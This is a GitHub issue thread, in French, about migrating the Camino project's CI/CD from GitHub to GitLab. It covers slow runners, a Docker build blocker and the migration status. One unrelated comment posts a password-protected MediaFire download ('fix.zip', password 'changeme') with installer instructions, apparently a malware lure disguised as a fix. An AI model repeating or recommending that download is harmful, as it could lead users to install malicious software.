### ISSUE TITLE
feat(infra): migre la CI sur gitlab

### ISSUE THREAD

**Issue by MichaelBitard** [MTES-MCT/camino#1438]
# Objectif

Migrer hors de github le code et la CI/CD.

À la fin de cette PR:
* Toute la CI/CD est sur gitlab
* On continue de déployer camino sur ovh avec le même principe (branche master --> dev, branche preprod --> preprod, branche prod --> prod)

## A migrer aussi ?

* Les issues / projects ?
* Le github-release automatique ?
* Codeql ?
* Gitguardian ?

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MichaelBitard** [comment]
État des lieux lors du dernier test:

On a une branche 'gitlab' que l'on pousse à la fois sur github et sur gitlab

Côté CI, première déconvenue : C'est **hyper** lent

Là sur un travail simple (qui prend en tout à peu près une minute sur github)

- sur github
    - mise à disposition du runner (quelques secondes)
    - installation avec cache ~40 secondes
    - lancement de la commande ~10 secondes
    - sauvegarde du cache ~0 seconde
- sur gitlab avec les runners 'global'
    - mise à disposition du runner ~ 2 minutes
    - restoration du cache ~ 2 minutes
    - installation plus exécution ~ 2 minutes
    - sauvegarde du cache ~ 7 minutes

On est sur quelque chose de pas vraiment utilisable par nous là pour le coup, on va regarder du côté des runners locaux, mais ça veut dire qu'on va avoir à gérer une flotte de runners locaux, ce qu'on n'avait pas à faire chez github.

Un exemple de job chez gitlab --> https://gitlab-forge.din.developpement-durable.gouv.fr/pub/pnm-public/camino/-/jobs/1244955
Le même chez github --> https://github.com/MTES-MCT/camino/actions/runs/10492269968/job/29063364482

**Comment by MichaelBitard** [comment]
## Point bloquant

La CI ne semble pas avoir la possibilité de builder des images docker.
C'est très embêtant

**Comment by MichaelBitard** [comment]
## État des lieux

Toute la CI/CD a été migré sur gitlab, on est entre 10 et 15 minutes de temps de build (on doit pouvoir gagner du temps avec le sharding des tests d'intégration)

Il faut voir maintenant ce qu'on peut faire sur les tickets/projets


### Contrainte

* Le port 3030 n'est pas ouvert donc on a du mettre en place une redirection de notre côté pour contourner ça... (https://tchap.gouv.fr/#/room/!tjUdijKsGrVTiMUWCt:agent.dev-durable.tchap.gouv.fr/$ACxDkNLU79Fb6tPVSlhVJN3JeZPo1N7zS-IWso9_PCc?via=agent.dev-durable.tchap.gouv.fr&via=agent.dinum.tchap.gouv.fr)
